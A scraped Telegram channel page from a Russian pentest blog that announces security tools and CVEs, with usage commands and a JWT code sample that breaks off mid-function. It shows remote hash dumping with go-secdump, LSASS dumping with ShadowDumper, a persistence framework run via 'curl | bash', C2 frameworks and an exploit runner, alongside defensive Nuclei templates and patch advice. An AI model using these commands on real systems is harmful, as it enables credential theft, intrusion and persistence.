Your trial period has ended!
For full access to functionality, please pay for a premium subscription
PT
Channel age
Created
Language
Russian
-
ER (week)
-
ERR (week)

Messages Statistics
Reposts and citations
Publication networks
Satellites
Contacts
History
Top categories
Main categories of messages will appear here.
Top mentions
The most frequent mentions of people, organizations and places appear here.
Found 70 results
PT
Pentest HaT
2 004 subscribers
1
19
This channel can’t be displayed because it violated Telegram's Terms of Service.i/DefaultCreds-cheat-sheet" target="_blank" class="primary-link">
03/30/2025, 09:21
t.me/pt_soft/540
PT
Pentest HaT
2 004 subscribers
6
8
421
🚩 VolgaCTF 2025 Qualifier

Через пару часов, в 15.00 по Мск стартует квалификация на VolgaCTF

➡️ https://q.2025.volgactf.ru

#volgactf #quals #ctf

✈️ Pentest HaT
03/29/2025, 13:21
t.me/pt_soft/539
PT
Pentest HaT
2 004 subscribers
5
19
418
🔄🖼️ go-secdump v0.5.0

Инструмент для удалённого извлечения хешей и копирования чувствительных 🏠 Windows файлов (SAM, LSA) без сохранения на диск

Добавлено:

Go-secdump can now dump the registry secrets without changing any DACLs thanks to the SeBackupPrivilege

Пример:

./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --sam

./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --lsa

./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --dcc2

Relay:

./go-secdump.exe --host 192.168.0.100 -n --relay

Основные опции:

--host
-P, --port
-d, --domain
-u, --user
-p, --pass
-n, --no-pass
--hash
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port

💻 Home
💻 Download

#soft #golang #redteam #gosecdump

✈️ Pentest HaT
03/29/2025, 12:26
t.me/pt_soft/538
PT
Pentest HaT
2 004 subscribers
5
8
552
🔑 GGH v0.1.4

Менеджер SSH сессий написанный на 🖼️

Внимание! Это не замена ssh клиента, а надстройка.
В Linux дистрибутивах стоит везде, в Windows 10/11 устанавливается 1ой командой:

# Проверка
Get-WindowsCapability -Online | ? Name -like 'OpenSSH.Client*'

# Установка
Add-WindowsCapability -Online -Name OpenSSH.Client*

Установка GGH:

# *nix based
curl https://raw.githubusercontent.com/byawitz/ggh/master/install/unix.sh | sh

# Windows
powershell -c "irm https://raw.githubusercontent.com/byawitz/ggh/master/install/windows.ps1 | iex"

# Go
go install github.com/byawitz/ggh@latest

В релизах есть собранные бинарники

Использование:

ggh root@server.com
ggh root@server.com -p2440

ggh

ggh -

ggh - stage
ggh - meta-servers

😹 Home
😹 Download

#ggh #ssh #golang

✈️ Pentest HaT
03/28/2025, 17:52
t.me/pt_soft/537
PT
Pentest HaT
2 004 subscribers
10
68
682
🎃 Awesome Hacker Search Engines

Большая подборка поисковиков, которые будут полезны ИТ специалистам, поиск по различным устройствам, эксплоитам, уязвимостям, исходным кодам и т.д.

➡️ https://awesome-hacker-search-engines.com

Постоянно пользуюсь сам:

▪️ Shodan
▪️ security.snyk.io
▪️ Exploit-DB
▪️ Sploitus
▪️ GTFOBins
▪️ LOLBAS
▪️ grep.app
▪️ DNSDumpster
▪️ Crt.sh
▪️ Have I Been Pwned
▪️ ntlm.pw

#search #security #servers #exploit

✈️ Pentest HaT
03/28/2025, 09:33
t.me/pt_soft/536
PT
Pentest HaT
2 004 subscribers
Repost
10
12
371
AdaptixC2 v0.3 is out

https://github.com/Adaptix-Framework/AdaptixC2

New:
* Linking Agents (eg SMB)
* Sessions Graph
* Agent marker
* Health checker
* And more in the changelog

https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.2-greater-than-v0.3

Репост/перепост приветствуется😉
03/27/2025, 18:42
t.me/pt_soft/535
PT
Pentest HaT
2 004 subscribers
Repost
11
3
434
Угнанный домен, утекшие данные — реализуй кибератаку на новом хосте Standoff Standalone!

В минувший понедельник внезапно стало известно о кибератаке на ИТ-компанию Carbon — одного из ведущих игроков Государства F.

Во время планового аудита служба ИБ обнаружила подозрительную активность в сети: оказалось, что доступ к контроллеру домена компании получили некие нарушители извне.

🚨 Какие последствия?
✔️ Несмотря на то что компания вернула контроль над инфраструктурой и сосредоточилась на устранении последствий, реальный масштаб ущерба пока неизвестен.
✔️ Клиенты обеспокоены: какие данные могли утечь?
✔️ Расследование продолжается, но уже очевидно, что компания потеряла часть очень важной информации.

💡 Твоя цель — повторить атаку: получить права доменного администратора в инфраструктуре Carbon. Если все пройдет удачно, флаг будет ждать тебя на его рабочем столе.

Автор хоста — Андрей Exited3n, а найти хост можно по адресу carbon.standalone.stf.

Проверь свои силы и проведи атаку — права администратора ждут тебя!
03/27/2025, 16:53
t.me/pt_soft/534
PT
Pentest HaT
2 004 subscribers
4
44
686
⚙️ iximiuz Labs

Практические задания, направленные на развитие ваших навыков в области 🖥 DevOps и/или серверной разработки. Одни задачи имеют более образовательный характер, другие же базируются на реальных сценариях. Платформа предлагает подсказки и обратную связь для каждого задания, включая автоматизированную проверку решений.

В разделе с контейнерами 75 задач и 43 для кубика.
Задания рассчитаны как на новичков, так и на опытных специалистов.
Похоже на Сodewars, но для DevOps

Примеры некоторых заданий:

▪️Run a Container in Background, Read Logs, and Attach
▪️Install and Configure containerd on a Linux Host
▪️Build a Production-Ready Node.js Container Image: Nuxt Application
▪️Classic Sysadmin Task: Which Process Is Listening on a Port?
▪️Make a Kubernetes Pod Survive an OOM Event Without Restarting

➡️ https://labs.iximiuz.com/challenges

#devops #training #docker #kubernetes

✈️ Pentest HaT
03/27/2025, 10:07
t.me/pt_soft/533
PT
Pentest HaT
2 004 subscribers
6
51
627
⚙️ ArgFuscator

Веб-приложение с открытым исходным кодом, которое помогает генерировать обфусцированные команды для 💻 Windows, 🐧 Linux и 💻 MacOS

➡️ https://argfuscator.net
😹 Offline version

#windows #obfuscator

✈️ Pentest HaT
03/26/2025, 10:08
t.me/pt_soft/531
PT
Pentest HaT
2 004 subscribers
50
623
03/26/2025, 10:08
t.me/pt_soft/532
PT
Pentest HaT
2 004 subscribers
Repost
8
11
471
🛠IngressNightmare или как снова что-то нашли

Всем привет, и да, я снова тут с постом, который никто особо не ждал, ведь выше есть пост, но пройти мимо такой темы я не смог. Сегодня расскажу более подробно про свежий и крайне неприятный инцидент в Kubernetes-мире.

❓Что стряслось и почему все в панике

Короче, ребята из Wiz недавно нашли серию критических уязвимостей в контроллере Ingress-NGINX для Kubernetes. Назвали это всё красиво и драматично – IngressNightmare. И поверьте, название выбрали неспроста: если коротко, то это пять CVE, из-за которых атакующий может спокойно выполнить код на ingress-контроллере и буквально угнать весь кластер со всеми секретами. И самое весёлое, что атакующему даже не нужны учётные записи или пароли, хватит одного кривого HTTP-запроса.

🔍 Технические подробности для тех, кто любит копаться в кишках

Суть этих уязвимостей кроется в недостаточной проверке входящих данных, которые разработчики Ingress-NGINX радостно вставляли напрямую в конфиги NGINX. Из-за этого через безобидные, казалось бы, аннотации (auth-url, auth-tls-match-cn, mirror-target) можно было внедрить произвольные директивы. Ну, например, какую-нибудь такую прелесть:

ssl_engine /tmp/malicious.so;


Именно это использовали исследователи Wiz в своём PoC. Ты просто отправляешь HTTP-запрос с большим телом, NGINX сохраняет это тело как временный файл, а потом через специальный AdmissionReview-запрос (без аутентификации!) загружает твою вредоносную .so библиотеку. И всё, поздравляю, теперь ты внутри контейнера с контроллером. Дальше читаешь секреты, токены и вообще делаешь, что хочешь.

‼️ Кто в опасности и как проверить себя любимого

Если ваша версия Ingress-NGINX ниже v1.12.1 (а ещё 1.11.5 и 1.10.7), то у вас серьёзные проблемы:
🔵 Узнать текущую версию можно через:

kubectl -n ingress-nginx get deploy ingress-nginx-controller -o=jsonpath='{.spec.template.spec.containers[0].image}'


🔵 Или через GitLab, найдя в манифестах YAML или Helm-чартах строку:

image: ingress-nginx/controller:v1.12.0


❔ Как с этим жить дальше

Что делать, если вы попали в этот клуб неудачников с уязвимой версией:

1. Срочно обновляйтесь до v1.12.1;

2. Пока не обновились, отключите admission-контроллер (controller.admissionWebhooks.enabled=false);

3. Ограничьте доступ к admission webhook с помощью Network Policy. Только API-сервер должен туда стучаться;

4. Просмотрите audit-логи Kubernetes и ищите подозрительные Ingress’ы с странными аннотациями.

Если вы не можете обновиться сразу (а кто из нас может?), хотя бы проверьте, что webhook не светит в интернет. В Wiz уже подсчитали, что около 6500 кластеров с открытым admission webhook доступны снаружи. Возможно, среди них есть и ваш.

👀 Личное мнение и мораль сей басни

Вот казалось бы, мелочь – не проверить пару строк кода, не закрыть пару портов, но в итоге получаешь катастрофу, достойную отдельного поста в моём канале. В очередной раз понимаешь, насколько всё хрупко и насколько важна роль команд AppSec и DevSecOps в крупных компаниях. В общем, проверьте свои кластеры, обновитесь и берегите нервы, они вам ещё пригодятся.

Спасибо, что дочитали мой очередной маленький монолог. Обещаю, скоро вернусь с чем-нибудь менее трагичным.

#devsecops #appsec
03/26/2025, 08:15
t.me/pt_soft/530
PT
Pentest HaT
2 004 subscribers
7
117
2.8 k
⚙️ IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX

Wiz Research обнаружила CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 и CVE-2025-1974, серию RCE в контроллере Ingress NGINX для Kubernetes, получившем название IngressNightmare. Использование этих уязвимостей приводит к несанкционированному доступу злоумышленников к чувствительным данным, хранящимся во всех namespace'ах кластера Kubernetes, что может привести к его захвату.

Nuclei шаблон для проверки:

id: exposed-ingress-nginx-admission

info:
name: Publicly exposed Ingress NGINX Admission
author: Wiz research
severity: high
description: Ingress Nginx admission controller endpoint should not be exposed
metadata:
max-request: 1
tags: ssl,tls

ssl:
- address: "{{Host}}:{{Port}}"

matchers:
- type: dsl
dsl:
- 'contains(issuer_org, "nil1")'
- 'contains(subject_org, "nil2")'
- 'contains(subject_an, "nginx")'
condition: and

extractors:
- type: json
name: issuer_org
json:
- ".issuer_org[0]"

- type: json
name: subject_org
json:
- ".subject_org[0]"

- type: json
name: subject_an
json:
- ".subject_an[0]"

Подробнее (на англ.)

➡️ Research

#nginx #ingress #cve

✈️ Pentest HaT
03/25/2025, 08:11
t.me/pt_soft/528
PT
Pentest HaT
2 004 subscribers
5
9
601
⚙️CVE-2025-29927 - Next.js and the corrupt middleware

Очередная уязвимость в популярном JS фреймворке

Next.js использует хедер x-middleware-subrequest, для предотвращения рекурсивных запросов

Уязвимость позволяет обойти проверки авторизации, выполняемые в промежуточном программном обеспечении Next.js, что потенциально позволяет злоумышленникам получить доступ к конфиденциальным данным

Недостаток устранен в версиях 12.3.5, 13.5.9, 14.2.25 и 15.2.3

Подробный разбор (на англ.)

➡️Summary

🔄 Nuclei шаблон:

id: nextjs-CVE-2025-29927

info:
name: Next.js - CVE-2025-29927
author: 6mile
severity: critical
description: |
Next.js has a critical vulnerability that allows attackers to bypass authentication entirely when the application utilizes middleware for authorization.
reference:
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
- https://nvd.nist.gov/vuln/detail/CVE-2025-29927
- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
- https://zeropath.com/blog/nextjs-middleware-cve-2025-29927-auth-bypass
metadata:
verified: true
vendor: vercel
product: next.js
framework: node.js
shodan-query:
- http.html:"/_next/static"
- x-powered-by: next.js
- x-nextjs-cache:
- cpe:"cpe:2.3:a:zeit:next.js"
fofa-query: body="/_next/static"
tags: nextjs,cve-2025-29927

http:
- method: GET
path:
- "{{BaseURL}}"

matchers-condition: and
matchers:
- type: word
name: Next.js
part: header
words:
- 'x-nextjs-cache:'
- 'x-powered-by: next.js'
- 'x-nextjs-prerender:'
- 'x-nextjs-stale-time:'
- 'set-cookie: NEXT_LOCALE='
condition: or
case-insensitive: true

- type: word
name: Next.js Middleware
part: header
words:
- 'x-middleware-rewrite:'
- 'x-middleware-set-cookie:'
condition: or
case-insensitive: true

- type: status
status:
- 200

#web #pentest #nextjs

✈️ Pentest HaT
03/24/2025, 12:39
t.me/pt_soft/527
PT
Pentest HaT
2 004 subscribers
2
19
612
💻 Glpwnme

Инструмент для проверки уязвимостей в инстансе GLPI
Написан на 🐍

Установка:

git clone https://github.com/Orange-Cyberdefense/glpwnme
cd glpwnme
pipx install .

Использование:

python3 glpwnme -t --list-plugins

# List all of the available exploits
python3 glpwnme.py -t https://test.glpi.com

# Run all the exploit (if version compatible) on the target that are opsec safe
python3 glpwnme.py -t https://test.glpi.com --check-all

# Check all the exploits on the target
python3 glpwnme.py -t https://test.glpi.com --check-all --no-opsec

# Get the help for the exploit
python3 glpwnme.py -t https://test.glpi.com -e --infos

# Run the exploit_to_use with the options for the run method
python3 glpwnme.py -t https://test.glpi.com -e --run -O "option1=value1" "option2=value2"

# Do not forget to check your log for restoring the .htaccess and keep the api_key
cat log.glpwnme

😹 Home

#glpwnme #pentest #python

✈️ Pentest HaT
03/24/2025, 09:22
t.me/pt_soft/526
PT
Pentest HaT
2 004 subscribers
8
30
426
💻 Offensive enumeration in activedirectory

➡️ Download

#powershell #windows #activedirectory #enumeration

✈️ Pentest HaT
03/22/2025, 10:31
t.me/pt_soft/525
PT
Pentest HaT
2 004 subscribers
4
16
489
▪️ Список open source LLM Security / WebApp Scanners

➡️ https://github.com/psiinon/open-source-llm-scanners

#llm #scanner #webapp

✈️ Pentest HaT
03/21/2025, 09:13
t.me/pt_soft/524
PT
Pentest HaT
2 004 subscribers
11
16
567
🐧 Kali Linux 2025.1a Release (2025 Theme, & Raspberry Pi)

Из основных изменений:

➡️Обновили темки
➡️Обновили DE's - KDE Plasma 6.2 & Xfce 4.20

Из утилит добавили неплохую hoaxshell - генератор реверс шеллов с обфускацией и прочим
Из интересного в общем то и все

Для перехода на новый релиз:

sudo apt update && sudo apt -y full-upgrade

➡️ Blog

#kali #update

✈️ Pentest Hat
03/20/2025, 14:18
t.me/pt_soft/523
PT
Pentest HaT
2 004 subscribers
16
129
983
🔄 💻 Cyberdefense Active Directory Mindmap v2025.03

Невероятно подробная шпаргалка по пентесту AD инфраструктуры. Лучше не встречал. Рекомендую!

АХТУНГ! Огромное разрешение 19148x7303

➡️ SVG
➡️ PNG

😹 Home

#activedirectory #pentest #cheatsheet #redteam #orange

✈️ Pentest HaT
03/06/2025, 20:46
t.me/pt_soft/522
PT
Pentest HaT
2 004 subscribers
6
14
529
🐧 Вдогонку к предыдущему посту

➡️https://hadess.io/the-art-of-linux-persistence/

#linux #persistence #redteam

✈️ Pentest HaT
03/06/2025, 17:17
t.me/pt_soft/521
PT
Pentest HaT
2 004 subscribers
4
31
510
🛡️ PANIX - Persistence Against *NIX v2.1.0

Мощный, модульный и легко настраиваемый framework для закрепления в 🐧ОС Linux, предназначенный для пентестеров, инженеров по обнаружению, CTF энтузиастов и других. Уделено особое внимание функциональности, что делает его важным инструментом для понимания и реализации широкого спектра методов закрепления.

Запуск:

curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh | bash

😹 Home

#soft #shell #linux #pentest

✈️ Pentest HaT
03/06/2025, 09:51
t.me/pt_soft/520
PT
Pentest HaT
2 004 subscribers
8
5
572
❤️ Люблю 💻 Manjaro и pacman

sudo pacman-mirrors --geoip && sudo pacman -Syu

Определяем быстрейшее зеркало и обновляемся
Пост от нечего делать, настроение хорошее сегодня 😁, а у вас ?

#manjaro #linux #pacman

✈️ Pentest HaT
03/05/2025, 20:41
t.me/pt_soft/519
PT
Pentest HaT
2 004 subscribers
Repost
11
47
527
XiebroC2 - open-source аналог CobaltStrike из Китая 😏

XiebroC2 позиционируется как многофункциональный C2-фреймворк с телеграм-нотификациями и поддержкой скриптов на Lua. Аналог Cobalt Strike, но с открытым кодом и фишками под RedTeam задачи ⌨️

Фичи 👈

1️⃣Кроссплатформеннный имплант на Golang под популярные семейства ОС
2️⃣Управление через client: файлы, процессы, сетевой трафик, инъекции, скриншоты, reverse shell/reverse proxy
3️⃣Возможность автоматически уведомлять о новых сессиях в Telegram

Помимо 3 основных фич есть возможность писать собственные плагины, для расширения функциональности и многое другое 🚬

Едиственный минус который я для себя заметил, это то что клиент и сервер только под Windows, можно конечно обернуть под Wine но это уже будет совсем другая история 😔

🔗 Repo: https://github.com/INotGreen/XiebroC2.git
🔗 Plugins: https://github.com/INotGreen/Xiebro-Plugins
🔗 Demo: https://www.youtube.com/watch?v=iZpltGdu4Y4

@s0ld13r_ch
03/05/2025, 13:18
t.me/pt_soft/518
PT
Pentest HaT
2 004 subscribers
5
53
578
💻 ShadowDumper v2.0

Мощный инструмент, который позволяет сделать дамп памяти LSASS. Использует различные продвинутые техники, позволяя получить доступ к конфиденциальным данным.

.\ShadowDumper.exe 1
To dump lsass memory using unhooking technique to inject modified mimikatz binary [Token Elevation, SAM Dumping, Vault Credentials, Lsass Hashes Dumping].

.\ShadowDumper.exe 2
To dump lsass memory using unhooking technique to inject binary using direct syscalls with MDWD.

.\ShadowDumper.exe 3
To dump lsass memory using simple MiniDumpWriteDump API.

.\ShadowDumper.exe 4
To dump lsass memory using MINIDUMP_CALLBACK_INFORMATION callbacks and encrypt the dumps before writing on disk as per your choice.

.\ShadowDumper.exe 5
To dump lsass memory using process forking technique and encrypt the dumps before writing on disk as per your choice.

.\ShadowDumper.exe 6
To dump lsass memory using direct syscalls with MiniDumpWriteDump.

.\ShadowDumper.exe 7
To dump lsass memory using direct syscalls (native dump with needed streams for parsing offline).

.\ShadowDumper.exe 8
To decrypt the dump file before offline parsing with tools like (mimikatz or pypykatz).

Сборку осуществлять в 💻 Visual Studio 2019 (v142) или новее, также в релизах есть собранный бинарник

😹 Home
😹 Releases

#redteam #soft #pentest #shadowdumper #lsass

✈️ Pentest HaT
03/05/2025, 10:14
t.me/pt_soft/517
PT
Pentest HaT
2 004 subscribers
10
26
485
🔄 🖥️ Above v2.8 (Codename: Rubens Barrichello)

Обновление невидимого сетевого сниффера, предназначенного для поиска уязвимостей в сетевом оборудовании. Основан на анализе сетевого трафика, поэтому не создает никакого шума в эфире. Построен на библиотеке Scapy.
Данный инструмент будет полезен не только пентестерам, но и инженерам по сетевой безопасности.

Поддерживаемые сетевые протоколы:

MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
VLAN (802.1Q)
S7COMM (Siemens) (SCADA)
OMRON (SCADA)
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP (SCADA)
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)
SNMP (Simple Network Management Protocol)

В 🐧 Kali Linux находится в репозиториях и устанавливается одной командой:

sudo apt update && sudo apt install above

Установка из исходников:

sudo apt-get install python3-scapy python3-colorama python3-setuptools
git clone https://github.com/casterbyte/above
cd above/
sudo python3 setup.py install

Работает в двух режимах:

Hot mode - работа непосредственно с сетевым интерфейсом с возможностью включить захват пакетов по таймеру

Cold mode - анализ дампов сетевого трафика

sudo above --interface eth0 --timer 120 --output above.pcap

above --input ospf-md5.cap

Author: Magama Bazarov

😹 Home
➡️ Kali tools

#above #sniffer #soft #python

✈️ Pentest HaT
03/04/2025, 09:27
t.me/pt_soft/516
PT
Pentest HaT
2 004 subscribers
18
53
609
🖥 Базовый софт

🤩 Пару лет назад уже делал подобный пост, но с той поры многое изменилось, решил обновить список используемого мной софта на повседневной основе.
Конечно, тут далеко не всё, с чем приходится иметь дело, но базовые утилиты и инструменты я постарался указать. Пишите в комментарии свои любимые инструменты и сервисы.

📌OS's:

💻 Manjaro ▪️ 🐧 Kali ▪️ 💻 Windows 11

📌Core:

➡️GNU core utilities
➡️Python + Pycharm
➡️Vivaldi | Firefox
➡️Virtual Box | Vmware Workstation
➡️OpenSSH

📌Base:

➡️Xfce + Qterminal
➡️Zsh + Oh my zsh
➡️Windows terminal + Oh my posh
➡️Total commander
➡️Midnight commander
➡️Sublime text
➡️Telegram
➡️Wireguard
➡️KeePassXC
➡️LDPlayer
➡️Obsidian
➡️Bandicam
➡️qBittorrent
➡️ShareX
➡️Clipdiary
➡️Sysinternals

📌 Tools:

➡️Sqlmap
➡️Ffuf
➡️Nmap | RustScan
➡️Pwncat-cs
➡️Burp suite
➡️Dbeaver
➡️Autopsy
➡️Hex editor neo
➡️SploitScan

📌Online services

➡️Perplexity
➡️Blackbox
➡️Sploitus
➡️WADComs
➡️CyberChef

#soft #kit #tools

✈️ Pentest HaT
03/03/2025, 09:48
t.me/pt_soft/513
PT
Pentest HaT
2 004 subscribers
46
23
722
💻 Чего не хватает курсу пентест AD по мнению одного из учащихся 🎃

#pentest #activedirectory #course

✈️ Pentest HaT
03/02/2025, 19:44
t.me/pt_soft/512
PT
Pentest HaT
2 004 subscribers
2
18
546
🔄 ⚙️ GoAccess v1.9.3

Real-time анализатор логов веб серверов, написан на 💻
Поддерживает любые кастомные логи:

Amazon CloudFront (Download Distribution).
Amazon Simple Storage Service (S3)
AWS Elastic Load Balancing
Combined Log Format (XLF/ELF) Apache | Nginx
Common Log Format (CLF) Apache
Google Cloud Storage.
Apache virtual hosts
Squid Native Format.
W3C format (IIS).
Caddy's JSON Structured format.

Установка в 🐧 Debian like:

sudo apt install goaccess

Запуск:

goaccess access.log
goaccess access.log -a > report.html
goaccess access.log -a -d -o json > report.json
tail -f access.log | goaccess -
goaccess access.log -o /usr/share/nginx/html/your_site/report.html --real-time-html

💻 Home
➡️ Main
➡️ Demo online

#soft #goaccess #clang

✈️ Pentest HaT
03/01/2025, 09:22
t.me/pt_soft/511
PT
Pentest HaT
2 004 subscribers
9
469
🎉 Результаты розыгрыша:

Победитель:
1. Yarubi (@rubyYarubi)

Проверить результаты
02/28/2025, 20:01
t.me/pt_soft/509
PT
Pentest HaT
2 004 subscribers
12
1
537
Напомню, сегодня вечером состоится розыгрыш на покупку мерча в магазине 🙃 HTB
Как раз, последний день зимы и пятница, жмем на кнопку - принять участие
https://t.me/pt_soft/501
02/28/2025, 13:07
t.me/pt_soft/508
PT
Pentest HaT
2 004 subscribers
14
57
440
⚙️SploitScan v0.13.0

Нашел отличный и удобный инструмент, предназначенный для поиска эксплоитов, известных уязвимостей и их эксплуатации с поддержкой 👩‍💻 AI (ChatGPT, Gemini, Grok и DeepSeek) и функцией импорта из популярных 😁 сканеров

Установка в 🐧 Debian like:

sudo apt install sploitscan

В репозиториях не самая новая версия, поэтому рекомендую ставить с гитхаба.

😹 Github:

git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt

PyPi:

pip install --user sploitscan

Источники PoC'ов:

➡️GitHub
➡️ExploitDB
➡️VulnCheck (нужен free API key)
➡️Packet Storm
➡️Nuclei

Импорт из:

Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)

В конфиге указываем API ключи поддерживаемых сервисов (config.json)

{
"vulncheck_api_key": "",
"openai_api_key": "",
"google_api_key": "",
"grok_api_key": "",
"deepseek_api_key": ""
}

Поиск по CVE:

sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413

Поиск по ключевым словам:

sploitscan -k "Outlook Express"

Импорт и экспорт:

sploitscan --import-file path/to/yourfile.nessus --type nessus

sploitscan CVE-2024-1709 -e {json,csv,html}

Помощь AI:

sploitscan --ai openai CVE-2024-21413

┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...
| 2. Potential Attack Scenarios
| ------------------------------
| ...
| 3. Mitigation Recommendations
| ------------------------------
| ...
| 4. Executive Summary
| ---------------------
| ...

#sploitscan #poc #cve #python

💻 Github

✈️ Pentest HaT
02/27/2025, 10:10
t.me/pt_soft/507
PT
Pentest HaT
2 004 subscribers
12
3
503
🔓 Lastpass

В далеком 2014 году зарегистрировал аккаунт в данном сервисе, сколько там сохранено записей трудно даже представить, а теперь и не узнать вовсе.

Вчера вечером не получилось войти с валидными кредами и я попробовал зарегистрировать новый аккаунт на свой же 📧email адрес и о чудо, поздравили с успешной регистрацией и предложили добавить свой первый пароль 😭

Знаю, что их несколько раз удачно "пентестили" 😂 И предпосылки сменить данный сервис имелись, но как всегда было лень и не доходили руки, теперь дошли.

Сказать что я чуть [цензура], ничего не сказать, доверие к подобным сервисам упало до нуля и было принято волевое решение использовать - 🔓 KeePassXC и держать все свои данные в локальной базе.

Благо с памятью у меня все в порядке и почти все необходимое помню наизусть, что не вспомню, буду восстанавливать.

Ну а вы друзья, товарищи, чем подобным пользуетесь ?

#keepassxc #passwords

✈️ Pentest HaT
02/26/2025, 09:26
t.me/pt_soft/506
PT
Pentest HaT
2 004 subscribers
6
13
485
✏️ 🔄 ImHex v1.37.1

Обновление открытого шестнадцатеричного редактора для работы в 💻 🐧💻
ImHex содержит всевозможные инструменты и функции, такие как средство просмотра энтропии и встроенный интерфейс для дизассемблера Capstone
Имеет пользовательский язык шаблонов, используемый для определения структур и типов данных, который обеспечивает автоматический анализ файлов и аннотацию
Написан на 💻 Распространяется по лицензии GPL-2.0

💻 Github
💻 Download
➡️ Home
➡️ Web version
➡️ Docs

#imhex #soft #cplusplus

✈️ Pentest HaT
02/25/2025, 08:29
t.me/pt_soft/505
PT
Pentest HaT
2 004 subscribers
7
12
594
🌐 Online cyber security threat maps

Небольшая подборка онлайн карт кибер угроз

➡️Kaspersky cyberthreat live map
➡️Checkpoint live cyberthreat map
➡️Radware live threat map
➡️Imperva live threat map
➡️Bitdefender threat map
➡️Netscout real time DDoS map
➡️Digital attack map
➡️SonicWall security center

#security #maps #threats

✈️ Pentest HaT
02/24/2025, 09:28
t.me/pt_soft/504
PT
Pentest HaT
2 004 subscribers
3
13
513
🧅 Onion Search Engine

Поисковик по Onion сети без использования Tor браузера

➡️ https://onionengine.com

Небольшой хинт для ленивых, как я 😁
Добавляем .dog после .onion и открываем сайт в обычном браузере, например - http://222222222k5na7udftysk7ytjsvmmr47p2e4zh2cftsaj7qvrts4u3id.onion.dog

Если все таки решили воспользоваться специализированным браузером и вам понадобились мосты, то в боте их можно получить выполнив команду !bridges

🤖 Бот в чате

#tor #onion

✈️ Pentest HaT
02/23/2025, 10:01
t.me/pt_soft/503
PT
Pentest HaT
2 004 subscribers
28
5
1.0 k
🙃 75 фунтов на покупку мерча в магазине - https://hackthebox.store
02/21/2025, 20:53
t.me/pt_soft/501
PT
Pentest HaT
2 004 subscribers
Repost
3
3
410
Турнир One Task Of The Month стартовал — первое задание уже ждет своих героев. Кто быстрее решит задачу и займет место в топе?

Проверяйте навыки, прокачивайте логику, забирайте кубки и доказывайте, что в кибербезопасности главное — не просто знание, а умение применять его в деле.

Время пошло.

➡️ Присоединяйтесь: https://one-task.cyber-ed.ru
➡️ Обсуждение в чате: https://t.me/CyberEd_CTF_chat
02/21/2025, 12:05
t.me/pt_soft/500
PT
Pentest HaT
2 004 subscribers
46
1
504
🙃 75 фунтов на мерч в магазине - https://hackthebox.store

Разыгрываем ?
02/20/2025, 16:41
t.me/pt_soft/499
PT
Pentest HaT
2 004 subscribers
11
76
806
🔄 💻 Adalanche v2025.2.6

Обновление отличного кроссплатформенного инструмента для визуализации, построения графов, связей и исследования Active Directory.
Даст мгновенные результаты, показывая, какие разрешения имеют пользователи и группы в 💻 AD. Полезен для изучения того, кто может управлять учетными записями, машинами или всем доменом, и может использоваться для поиска и отображения неправильных конфигураций. Покажет проблемы делегирования, AD CS и многое другое.
Проект активно развивается. Написан на 💻

Отличия от 😉 BloodHound:

Не требуется Neo4J, Python
Не требуется предварительной настройки
Для построения запросов используется расширенный LDAP синтаксис
Наличие бесплатной и коммерческой версии

Машина в домене:

adalanche.exe collect activedirectory

Машина не в домене:

adalanche.exe collect activedirectory --ignorecert --domain contoso.local --authdomain CONTOSO --username dom_user --password P@ssw0rd

Будет создана папка data

Анализ:

adalanche.exe analyze

💻 Github
💻 Documentation
➡️ Commercial version

#adalanche #golang #soft #activedirectory

✈️ Pentest HaT
02/20/2025, 08:06
t.me/pt_soft/497
PT
Pentest HaT
2 004 subscribers
1
16
555
📔 2-МР

Это из рекомендаций ЦБ по пентестам, мне очень понравилось название - паспорт уязвимости
Следует уже кто-то данным рекомендациям ? 😁

https://www.cbr.ru/Crosscut/LawActs/File/9945

✈️ Pentest HaT
02/19/2025, 14:39
t.me/pt_soft/496
PT
Pentest HaT
2 004 subscribers
5
20
551
⚙️Онлайн инструменты для работы с JWT

JSON Web Token - специальный формат токена, который позволяет безопасно(в идеале 😁) передавать данные между клиентом и сервером.

Состоит из трёх частей: заголовок, пейлоад и подпись

➡️Мой любимый - https://token.dev
➡️По классике - https://jwt.io
➡️Еще неплохой вариант
➡️Отдельно декодер для Flask Session Cookie

Пример простейшей реализации на Python 🐍

import json
import hmac
import hashlib
import base64
import uuid

header = {"typ": "JWT", "alg": "HS256"}
payload = {"name": "exited3n", "isAdmin": True}
secret = str(uuid.uuid4())


def jwt_gen(header: dict, payload: dict, secret: str) -> bytes:
jwt_parts = []
json_header = json.dumps(header).encode()
json_payload = json.dumps(payload).encode()
jwt_parts.append(base64.urlsafe_b64encode(json_header))
jwt_parts.append(base64.urlsafe_b64encode(json_payload))

merge_payload_header = b'.'.join(jwt_parts)

signature = hmac.new(secret.encode(), merge_payload_header, hashlib.sha256).digest()
